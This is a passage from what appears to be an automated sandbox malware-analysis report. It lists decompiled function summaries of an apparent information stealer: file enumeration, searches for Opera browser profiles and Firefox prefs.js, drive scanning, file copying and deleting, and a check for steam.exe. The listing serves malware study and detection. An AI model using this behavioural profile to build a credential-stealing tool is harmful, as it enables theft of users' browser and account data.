  • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
  • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
  • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
  • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
  • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
• FindNextFileA.KERNEL32(?,?), ref: 00195663
• FindClose.KERNEL32(?), ref: 00195677
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
• String ID: %s\%s
• API String ID: 1150833511-4073750446
• Opcode ID: 07dc9aeaad20651ce0251c6d5d2fd4e83a3390b811fcfc3b5f5e0647ee3c43b8
• Instruction ID: 17e4d8543c78f71e41124d5fc38fdd3b65d96da76d61693ff0d8d28101fcfcea
• Opcode Fuzzy Hash: 07dc9aeaad20651ce0251c6d5d2fd4e83a3390b811fcfc3b5f5e0647ee3c43b8
• Instruction Fuzzy Hash: 3D5130B594021C9BCF61EF74DC89AD9BBBCAB08300F4045E6E609E3250EB319B85CF65
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• FindFirstFileA.KERNEL32(?,?,\*.*,001B682E,0018CC40,?,?), ref: 0018BF9A
• StrCmpCA.SHLWAPI(?,001B7468), ref: 0018BFBA
• StrCmpCA.SHLWAPI(?,001B746C), ref: 0018BFD4
• StrCmpCA.SHLWAPI(?,Opera,001B683B,001B683A,001B6837,001B6836,001B6833,001B6832,001B682F), ref: 0018C060
• StrCmpCA.SHLWAPI(?,Opera GX), ref: 0018C06E
• StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0018C07C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
• String ID: Opera$Opera Crypto$Opera GX$\*.*
• API String ID: 2567437900-1710495004
• Opcode ID: 69501c8571a41c148d1f26db5a36afe530db03e00b5fc0b2bb3d15fb934c3a72
• Instruction ID: 5adeaa244263a3b3a9b2c3a2896c2bee3a665056b70edb613d787b1fcab5ee1d
• Opcode Fuzzy Hash: 69501c8571a41c148d1f26db5a36afe530db03e00b5fc0b2bb3d15fb934c3a72
• Instruction Fuzzy Hash: C602B331D001299BDF62FB24DD46ADDB7B4AF69304F4141E1E918B7162DB74AF8A8F80
APIs
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00195202
• _memset.LIBCMT ref: 00195225
• GetDriveTypeA.KERNEL32(?), ref: 0019522E
• lstrcpyA.KERNEL32(?,?), ref: 0019524E
• lstrcpyA.KERNEL32(?,?), ref: 00195269
  • Part of subcall function 00194D08: wsprintfA.USER32 ref: 00194D5C
  • Part of subcall function 00194D08: FindFirstFileA.KERNEL32(?,?), ref: 00194D73
  • Part of subcall function 00194D08: _memset.LIBCMT ref: 00194D8F
  • Part of subcall function 00194D08: _memset.LIBCMT ref: 00194DA0
  • Part of subcall function 00194D08: StrCmpCA.SHLWAPI(?,001B6A00), ref: 00194DC1
  • Part of subcall function 00194D08: StrCmpCA.SHLWAPI(?,001B6A04), ref: 00194DDB
  • Part of subcall function 00194D08: wsprintfA.USER32 ref: 00194E02
  • Part of subcall function 00194D08: StrCmpCA.SHLWAPI(?,001B660F), ref: 00194E16
  • Part of subcall function 00194D08: wsprintfA.USER32 ref: 00194E3F
  • Part of subcall function 00194D08: _memset.LIBCMT ref: 00194E68
  • Part of subcall function 00194D08: lstrcatA.KERNEL32(?,?), ref: 00194E7D
• lstrcpyA.KERNEL32(?,00000000), ref: 0019528A
• lstrlenA.KERNEL32(?), ref: 00195304
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
• String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
• API String ID: 441469471-147700698
• Opcode ID: 10c560117917cfbd4ee792b74dcad66e0a251e4b7e7ce20669f728359b0fab0a
• Instruction ID: 88212482e61c38d6adeb350daf76865ac36e759293298fcb9c1376b129d362aa
• Opcode Fuzzy Hash: 10c560117917cfbd4ee792b74dcad66e0a251e4b7e7ce20669f728359b0fab0a
• Instruction Fuzzy Hash: 875119B190021CAFDF21AF64DC85AEEBBB9FB05304F0041A9FA09A7111EB315E49CF55
APIs
• wsprintfA.USER32 ref: 0018CD31
• FindFirstFileA.KERNEL32(?,?), ref: 0018CD48
• StrCmpCA.SHLWAPI(?,001B74E4), ref: 0018CD69
• StrCmpCA.SHLWAPI(?,001B74E8), ref: 0018CD83
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • lstrlenA.KERNEL32(0018D38A,001B685F,001B74EC,?,001B685E), ref: 0018CE16
                                                                                                                                                                        • DeleteFileA.KERNEL32(?,001B7504,001B686E,?,001B7500,001B74FC,001B74F8,001B74F4), ref: 0018D0F7
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018D10B
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0018D211
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0018D225
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
• String ID: %s\*.*
• API String ID: 3967855609-1013718255
• Opcode ID: 2c9375e3ace59dc527d45d6153336a27e1305466c71150ccb9ca3c91146dc08d
• Instruction ID: 0e61b99e716c997aae1de8279eb171b2eb0d1434b9ea52b41ff9e28cee533809
• Opcode Fuzzy Hash: 2c9375e3ace59dc527d45d6153336a27e1305466c71150ccb9ca3c91146dc08d
• Instruction Fuzzy Hash: F2D17932D011299BEF22FB24DD46ADD77B4AF59314F4140E1E918B7152DB70AF8A8F81
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• FindFirstFileA.KERNEL32(?,?,001B7568,001B6887,?,?,?), ref: 0018D61C
• StrCmpCA.SHLWAPI(?,001B756C), ref: 0018D63D
• StrCmpCA.SHLWAPI(?,001B7570), ref: 0018D657
• StrCmpCA.SHLWAPI(?,prefs.js,001B7574,?,001B688F), ref: 0018D6E3
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018D7BD
• DeleteFileA.KERNEL32(?), ref: 0018D888
• FindNextFileA.KERNEL32(?,?), ref: 0018D92B
• FindClose.KERNEL32(?), ref: 0018D93F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
• String ID: prefs.js
• API String ID: 893096357-3783873740
• Opcode ID: 94dd6d1bddea8546b12d9c4dcd2320983777fed03358e8764ebc12b0b76107df
• Instruction ID: 92dfa5424c2215c648c9f86604de739aea034a4061db0b784bf08e1a234e5b1a
• Opcode Fuzzy Hash: 94dd6d1bddea8546b12d9c4dcd2320983777fed03358e8764ebc12b0b76107df
• Instruction Fuzzy Hash: 1FA1B632D006289BDF62FB24EC46ADD77B4AF55314F4141E1E908B7291DB74AF8A8F81
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• FindFirstFileA.KERNEL32(?,?,\*.*,001B6826,?,?,?), ref: 0018B970
• StrCmpCA.SHLWAPI(?,001B7434), ref: 0018B991
• StrCmpCA.SHLWAPI(?,001B7438), ref: 0018B9AB
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018BDE0
  • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
  • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
  • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
  • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018BE57
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0018BEC6
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0018BEDA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 2055012574-1173974218
                                                                                                                                                                        • Opcode ID: cae1397945f495a2b7816b8c673c7e8c72d07033923928b673e73c6d84920856
                                                                                                                                                                        • Instruction ID: 10dee6d13d986b8f50be62ea8280e795e6748905fc9f049e38e5ac332025a789
                                                                                                                                                                        • Opcode Fuzzy Hash: cae1397945f495a2b7816b8c673c7e8c72d07033923928b673e73c6d84920856
                                                                                                                                                                        • Instruction Fuzzy Hash: 8CE17F31900529DBDF22FB24DD46ACDB7B4AF69709F4240E1E51877162DB34AF8A8F80
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,001B741C,001B6822,?,?,?), ref: 0018B62C
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7420), ref: 0018B64D
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7424), ref: 0018B667
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B7428,?,001B6823), ref: 0018B6F4
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0018B755
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 0018ABBA: CopyFileA.KERNEL32(?,?,00000001), ref: 0018AC5F
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0018B8C0
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0018B8D4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3801961486-0
                                                                                                                                                                        • Opcode ID: 3f0b26787d2530ba4a11da699b4900b879a5ba38d655e5e000979fac2f5d72ae
                                                                                                                                                                        • Instruction ID: 6901081a48478e08badedc81b39f74d71cbe2cde0715a796eb26cc9ce052e184
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f0b26787d2530ba4a11da699b4900b879a5ba38d655e5e000979fac2f5d72ae
                                                                                                                                                                        • Instruction Fuzzy Hash: C181F7319046189BCF62FB34EC86ADD77B8AB18304F4501A1FD08A7651EB74AF998F91
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 00192487
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001924A9
                                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 001924B9
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 001924CB
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 001924DD
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001924F6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
